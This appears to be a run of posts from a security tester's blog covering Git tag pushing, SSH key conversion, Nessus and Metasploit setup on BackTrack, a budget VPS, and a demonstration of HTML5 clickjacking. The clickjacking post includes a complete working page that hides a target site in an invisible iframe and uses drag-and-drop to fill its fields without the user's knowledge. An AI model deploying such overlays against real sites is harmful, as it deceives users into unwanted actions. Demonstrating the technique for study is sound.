NFTF: Pushing tags to Git Repositories – Converting puttygen keys to openssh versions

I’m working on a side project that has me contributing to a GIT repository for source control.

Great! Only I haven’t got a freaking clue how to use it properly.

First in the list:

Pushing “Tags” up to the master repository

First thing to note is that tags are typically only noted on your local copy of the repository. They aren’t pushed up to the origin when you make a Git Push, unless you specify otherwise.

This is fine and dandy if you’re using the command line Git client from the off. Me, I was using TortoiseGit on Windows, bypassing the whole setting up of Git Bash, and there isn’t a simple checkbox that I’ve found in TortoiseGit that says “push tags” along with a Git push. So I needed to set it up.

The command that you have to run is:

git push origin --tags

This will push any tags that you have associated with your code (TortoiseGit can create them: right-click your repository and select “add tag”) up to the origin on your master repository (in my case hosted on Assembla).

However, before you get to that step you’ll need to have set up your Git Bash first, and in my case, as Assembla uses PKI for authentication, I would need to either:

a. Create a new key for the same computer, just for the Git Bash instance, and add it (what I’ve typically done in the past, but loathed because it’s just duplication of effort)

b. Figure out why “export OpenSSH version” of my keys from PuTTYgen has never actually just worked for me.

This time around I opted for b.

Converting PPK to id_rsa

I found this answer on Stack Overflow, courtesy of a user called Kaleb Pederson; it is as follows:

  1. Open PuttyGen
  2. Click Load
  3. Load your private key
  4. Go to Conversions->Export OpenSSH and export your private key
  5. Copy your private key to ~/.ssh/id_rsa (or id_dsa).
  6. Create the RFC 4716 version of the public key using ssh-keygen
  7. ssh-keygen -e -f ~/.ssh/id_rsa > ~/.ssh/id_rsa_com.pub
  8. Convert the RFC 4716 version of the public key to the OpenSSH format:
  9. ssh-keygen -i -f ~/.ssh/id_rsa_com.pub > ~/.ssh/id_rsa.pub

With that done, your Git Bash should now be able to authenticate correctly to your Git repository using the same PPK you already use for TortoiseGit.
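Steps 6 to 9 only re-wrap the public key between two encodings of the same key blob. The following is an added Python example (mine, not from the post or the Stack Overflow answer) that does the same re-wrapping on a constructed sample blob and computes the SHA256 fingerprint that current `ssh-keygen -lf` shows, so a converted key can be compared against the original before it is trusted.

```python
import base64
import hashlib

def _ssh_string(b: bytes) -> bytes:
    return len(b).to_bytes(4, "big") + b

def _mpint(n: int) -> bytes:
    # RFC 4251 mpint: big-endian, with a leading zero byte when the high bit is set
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))

def build_rsa_blob(e: int, n: int) -> bytes:
    """Wire-format public key blob: string "ssh-rsa", mpint e, mpint n."""
    return _ssh_string(b"ssh-rsa") + _mpint(e) + _mpint(n)

def key_type(blob: bytes) -> str:
    length = int.from_bytes(blob[:4], "big")  # the algorithm name is the first length-prefixed string
    return blob[4:4 + length].decode()

def openssh_to_rfc4716(line: str) -> str:
    """What `ssh-keygen -e` does to a public key: wrap the same blob in the RFC 4716 envelope."""
    parts = line.split(None, 2)
    b64, comment = parts[1], (parts[2] if len(parts) > 2 else "")
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))  # RFC 4716 lines are <= 72 chars
    header = f'Comment: "{comment}"\n' if comment else ""
    return f"---- BEGIN SSH2 PUBLIC KEY ----\n{header}{body}\n---- END SSH2 PUBLIC KEY ----\n"

def rfc4716_to_openssh(text: str) -> str:
    """What `ssh-keygen -i` does: drop envelope and headers, read the type back out of the blob."""
    comment, b64_lines = "", []
    for ln in text.splitlines():
        if ln.startswith("----"):
            continue
        if ":" in ln and not b64_lines:  # header line; base64 never contains ':'
            name, _, value = ln.partition(":")
            if name.strip().lower() == "comment":
                comment = value.strip().strip('"')
            continue
        b64_lines.append(ln.strip())
    b64 = "".join(b64_lines)
    line = f"{key_type(base64.b64decode(b64))} {b64}"
    return f"{line} {comment}" if comment else line

def fingerprint_sha256(line: str) -> str:
    """The value current `ssh-keygen -lf` prints; compare it before trusting a converted key."""
    blob = base64.b64decode(line.split()[1])
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")

# Constructed sample: a tiny modulus so the blob is short; only the format round-trip matters here.
SAMPLE_OPENSSH = "ssh-rsa " + base64.b64encode(build_rsa_blob(65537, 0xC0FFEE1234567891)).decode() + " user@laptop"
```

The private key copied in step 5 must be readable only by its owner (chmod 600 ~/.ssh/id_rsa) or OpenSSH will refuse to use it.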

Leveraging HTML5 in order to turbo-charge clickjacking

You have a website and you’ve proven it’s vulnerable to clickjacking, but what use is fooling a user into submitting a form unless you can specify some of the data that the user is submitting within those fields?

We’ve all played games online where you have to match up words to phrases or maybe things like the “impossible game” where you drag the words to the respective colours.

What about turning a harmless game such as the above into a form submission machine of awesome? Well, now with HTML5, you can!

It’s all thanks to the drag-and-drop API and in particular the ondragstart event handler.

draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Rick Astley')"

Use that on anything you want to make draggable. In my testing I opted for a simple <div> containing a string, and asked the players to drag and drop the string onto the correct corresponding sentence.

When they click the “answer” button, it submits the jacked site.

So... users drag the word CSS across to Cascading Style Sheets, which enters “Rick Astley” into the search field of videos.yahoo.com;

then users click the “answer” button, which submits the video search.

Now, ideally, if Google didn’t have X- headers set that forbid the use of Google in an iframe I’d have gone and “I’m feeling lucky”d it, but sadly no autoplaying Rick Astley for me.

Still the premise is proven.
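The only thing that stopped the Google variant was a framing header. As an added example (not from the post), here is a Python check that reads a response's X-Frame-Options and Content-Security-Policy frame-ancestors headers the way a browser evaluates them and says whether the page could be rendered inside an iframe from a given origin; the header sets and hostnames are constructed.

```python
from urllib.parse import urlsplit

def _origin(url: str):
    p = urlsplit(url)  # scheme and hostname come back lowercased
    return (p.scheme, p.hostname, p.port or {"http": 80, "https": 443}.get(p.scheme))

def _host_matches(pattern: str, host: str) -> bool:
    # CSP host-source: '*.example' matches any subdomain of example but not 'example' itself
    return host.endswith(pattern[1:]) if pattern.startswith("*.") else pattern == host

def _allowed_by_frame_ancestors(sources, embedder: str, target: str) -> bool:
    emb = urlsplit(embedder)
    for src in sources:
        s = src.lower()
        if s == "'none'":
            return False
        if s == "*" or (s == "'self'" and _origin(embedder) == _origin(target)):
            return True
        if s.endswith(":") and "/" not in s and emb.scheme == s[:-1]:  # scheme-source, e.g. https:
            return True
        if "'" not in s:  # host-source, e.g. https://*.partner.example
            scheme, _, host = s.rpartition("://")
            host = host.split("/")[0].split(":")[0]
            if (not scheme or scheme == emb.scheme) and _host_matches(host, emb.hostname or ""):
                return True
    return False

def framing_allowed(headers: dict, embedder: str, target: str) -> bool:
    """True if a browser honouring the target's headers would render it inside a page at `embedder`.
    A CSP frame-ancestors directive takes precedence over X-Frame-Options when both are present."""
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return _allowed_by_frame_ancestors(parts[1:], embedder, target)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _origin(embedder) == _origin(target)
    return True  # no framing policy (or obsolete ALLOW-FROM, which current browsers ignore): frameable

# Constructed sample header sets: the unprotected case the game relied on beside two fixed ones.
SAMPLE_RESPONSES = {
    "unprotected": {"Content-Type": "text/html"},
    "xfo_sameorigin": {"X-Frame-Options": "SAMEORIGIN"},
    "csp": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://*.partner.example"},
}
```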

[Screenshots: Html5_clickjack_1, Html5_clickjack_2, Html5_clickjack_3]

Edit:

Now with added code and a demonstration video.

Video Here:

I’m no web developer and quickly ran out of patience when working on the positioning issues so feel free to take, improve and build on it. I was merely creating this just to play with some of the features of HTML5.

Enjoy!

<html>
  <head>
    <title>HTML Clickjacking demonstration - drag and WTF!?</title>
    <style>
      iframe{position: absolute; top:0px; left:0; filter: alpha(opacity=0); opacity:0; z-index:1}
      button{position: absolute; top:40px; left: 805px; z-index:-1; width:107px; height:26px;}
      .magicfield1{position: absolute; top:40px; left: 340px; z-index:-1; height: 26px; border: 1px solid orange}
      .magicfield2{position: absolute; top:40px; left: 480px; z-index:-1; height: 26px; border: 1px solid orange}
      .magicfield3{position: absolute; top:40px; left: 650px; z-index:-1; height: 26px; border: 1px solid orange}
      .magictext{position: absolute; top:54%; left: 50%; z-index:-1;}
      .showhider{position: absolute; top:90%; left: 1%}
      .intro{position: absolute; top:50%; left:0}
    </style>
    <script type="text/javascript">
      function mask(){
        document.getElementById("iframe").style.opacity = ".1"; // for most browsers
        document.getElementById("iframe").style.filter = "alpha(opacity=10)"; // for IE
      }
      function hide(){
        document.getElementById("iframe").style.opacity = ".0"; // for most browsers
        document.getElementById("iframe").style.filter = "alpha(opacity=0)"; // for IE
      }
      function show(){
        document.getElementById("iframe").style.opacity = ".9"; // for most browsers
        document.getElementById("iframe").style.filter = "alpha(opacity=90)"; // for IE
      }
      function reveal(){
        alert("Checking your answer...");
        document.getElementById("iframe").style.opacity = ".9"; // for most browsers
        document.getElementById("iframe").style.filter = "alpha(opacity=90)"; // for IE
      }
    </script>
  </head>
  <body>
    <div class="intro">
      <p>Hello and welcome to the match game</p>
      <p>All you have to do is drag the following 3 letter acronym to the matching string ---> </p>
      <p class="showhider">As you know it's a test - Show iframe - Hide iframe - Mask iframe </p>
    </div>
    <!-- Not in the posted markup: the iframe with id="iframe" that the functions above toggle,
         and the onclick handlers for the Show/Hide/Mask links and the Answer button -->
    <div class="magictext" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Rick Astley')">
      <H1 style="border: 1px dashed black">CSS</H1>
    </div>
    <span class="magicfield1">Cross Site Scripting</span><span class="magicfield2">Cuddly Slippery Snakes</span> <span class="magicfield3">Cascading Style Sheets</span>
    <button>Answer</button>
  </body>
</html>

Pastebin Link: http://pastebin.com/BeenqC19

msfupdate on Backtrack 5r2

Having annoying SVN issues trying to run msfupdate on your BT5R2 install?

Something along the lines of “no version information found”.

Try this:

cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
mv libssl.so.0.9.8 libssl.so.0.9.8-backup
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8

The above was obtained from the BackTrack forums, but given the number of threads on there with similar topics, I’m guessing not a lot of people are seeing the actual solution.

As with everything I post, it worked for me but your mileage may vary.

Nessus 5.0 on Backtrack 5r2 Continued…

So you’ve followed the instructions in my previous post alright and gone to browse to http://localhost:8843, have already pre-empted the NoScript nags by allowing all scripts from localhost (or whatever your paranoia level allows you to do), and still can’t get past that annoying “Nessus requires flash player 10.2 or later” message.

Don’t fear and don’t bother following any other horrible tutorial that involves shoving an old piece of flash software on your system. It’s time to go for the bleeding edge.

Within a terminal type:

wget http://fpdownload.macromedia.com/get/flashplayer/pdc/11.1.102.63/install_flash_player_11_linux.i386.tar.gz
tar xvzf install_flash_player_11_linux.i386.tar.gz
mkdir ~/.mozilla/plugins
mv libflashplayer.so ~/.mozilla/plugins/

Then just delete everything else that got extracted.

Yes, it’s the 32-bit Flash, but it works.

Yes I know, it’s not the 64-bit Flash… but it still works on the x64 install of BT5R2 and does the job for accessing Nessus.

Now you can browse to http://localhost:8834, create your user, ignore the bit about “enter your feed” details if it comes up (close the browser and re-open it) and voila… Nessus 5.0 on BT5R2.

Nessus 5.0 on Backtrack 5r2

Note: I’ve not tried this on anything else so YMMV if you try this on 5r1 or less.

Fire open a terminal window and as root type:

apt-get remove nessus

This will remove the old v4.4.1 version from your BackTrack instance and stop any nastiness occurring when you run the install with the two versions clashing.

Now head to http://www.nessus.org and grab yourself a copy of the latest version.

If you’re lucky enough to have a professional feed, great stuff.

If it’s your first time dealing with nessus, you’ll need to register for a homefeed so follow the steps online.

Download the package labeled as: Nessus-5.0.0-ubuntu910_amd64.deb (if you’ve a 64bit machine, else go for i386). I’ve not tested any other packages but I know the above one worked for me.

Now, back within the terminal window and in the location you saved the file to, type:

dpkg -i Nessus-5.0.0-ubuntu910_amd64.deb

and watch as it magically installs everything you need. Upon completion, Nessus should be callable from the path.

Run:

nessus-fetch --version

to confirm the version number; it should come back as 5.0.0.

Then using the code either for your professional feed or home feed register your nessus install:

nessus-fetch --register SERIAL_NUMBER_YOU_HAVE

Wait and it should confirm a successful registration and download the plugins.

Now just fire up nessus (first time after an update it takes an age as it unpacks and loads the plugins) and you’re away.

Not quite. What will come next is a guide as to how on earth you get Flash working in the onboard firefox on BT5R2.

Then, you should be all set for nessus scanning from your backtrack installation.

Going for the low end…

So I’ve been umming and ahhing for a while about buying a VPS to use for hosting files or playing with the IP over ICMP and DNS tunnelling system, even playing with a basic PBX setup to hook up with my sipgate account that I use for a landline.

But 3 things have stopped me from doing it in the past.

1. Security – I’m paranoid, more so now I’m in my current job, about just how easy it is to break into systems without too much hassle. Heck, I do it for my day job; do I really want to take on board the full management of a server that has no security other than what I apply to it?

2. Security – I’m paranoid, but I’d consider myself at least proficient at my job. What’s the likelihood I’ll tweak something, knacker the install and have to rebuild it over and over just because I was trying to lock it down just that bit more?

3. Cost – VPS instances aren’t cheap for something that may be left alone for months before being used on occasion.

So I never got around to it. I did mess about once, but after pooching the firewall and having to pay £15 for a server rebuild, as they had no other way of accessing it and support wouldn’t just take the firewall down for me, I cancelled the account and never looked again.

Until now. I’ve been browsing the entries over at www.lowendbox.com and monitoring the offers up there; understandably a lot of the offers are flashes in the pan: you pay $5 for access to an amazing VM, a week later the company stops trading and starts up another scam.

However I came across a post about a company called “quickpacket” offering a very basic low end VM (128mb ram, 256mb vSwap, 20GB HDD, 500GB transit) for $15 for 12 months.

At just over $1 a month I figured I could suck that up if they disappeared overnight, but I read into them. They’ve been trading quite a while now; it looks like a seller of webspace primarily, but they have moved into VPS hosting.

So yes, I am now the proud new owner of a mini-VPS. Stay tuned for developments, but on the cards I’m thinking private SVN repository, ICMP tunnelling and maybe a play about with that PBX idea.

P.S. I’ve already locked myself out of it at least 10 times, thank goodness they have other means to access it and a great big “rebuild” button for when you absolutely hosed the box, no additional costs 🙂

NFTF: Extracting the important bits from wsusscn2.cab

Working on a script for extracting MS numbers for patches for work.

The following command allows 7-Zip to extract just the needed files without extracting the hundreds of thousands of other items in a giant lump.

"c:\Program Files\7-Zip\7z.exe" x -ir!x/* cabs/package*.cab

Bloody useful